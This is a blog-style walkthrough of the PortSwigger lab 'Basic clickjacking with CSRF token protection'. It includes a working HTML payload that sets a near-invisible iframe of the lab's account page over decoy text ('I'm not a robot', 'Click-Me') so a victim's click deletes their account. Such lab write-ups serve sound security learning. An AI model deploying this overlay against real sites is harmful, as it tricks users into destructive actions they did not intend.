Lab 1#: Basic clickjacking with CSRF token protection

PortSwigger Lab

Hey my dear readers, Clickjacking (UI Redressing) is a web attack where the attacker manipulates the browser UI to make the user click on the targeted site without their knowledge. Remember_Clickjacking is possible if the site does not have X-Frame-Options or CSP frame-ancestors in its HTTP Response header_. Today we will solve “Basic clickjacking with CSRF token protection” where our goal is to trick the victim into performing an action on their account (delete account).

Press enter or click to view image in full size

at frist , we login to the lab and go to the My Account / Account page.
There is a “update email, accaount delete, and exploit server” button there: now account delete-that is our target.

Press enter or click to view image in full size

We go to the exploit server and write some html code there. This will be shown to the victim.

Press enter or click to view image in full size

This is your server. You can use the form below to save an exploit, and send it to the victim.Please note that the victim uses Google Chrome. When you test your exploit against yourself, we recommend using Burp’s Browser or Chrome.

Here we can go to View Exploit to check the perfect functionality of our html code and when we are done writing the html code, we will deliver the exploit to the victim page.

Press enter or click to view image in full size

<!DOCTYPE html>
<html>
<head>    <style>
        iframe {
            position: relative;
            width: 1135px;
            height: 600px;
            opacity: 0.000001;   /* makes it invisible */
            z-index: 2;
        }
        h2 {
            position: absolute;
            top: 445px;
            left: 60px;
            z-index: 1;
        }
  h4 {
            position: absolute;
            top: 500px;
            left: 60px;
            z-index: 1;
        }
 p {
            position: absolute;
            top: 540px;
            left: 170px;
            z-index: 1;
        }
    </style>
    <h2>I'm not a robot</h2> 
    <h4>Click-Me</h4>
   <p>Privacy-Team</p>
    <iframe src="https://lab-id.web-security-academy.net/my-account"></iframe>
</body>
</html>

Press enter or click to view image in full size

for check: opacity was: 0.5

Here the victim will only see “I’m not a robot, Click-Me, Privacy-Team”.
Reduce the opacity of the iframe very much → it disappears but keep the z-index and the iframe remains on top.
As a result, whenever the victim clicks on the Click-Me button, he is essentially clicking on the Delete Account button of the iframe, resulting in the account being deleted.

Press enter or click to view image in full size

opacity: 0.000001;

Burp-Suite capture accaount successfully deleted

Press enter or click to view image in full size

When the account is deleted then we get a pop-up message, congratulating us that the issue with your room has been solved.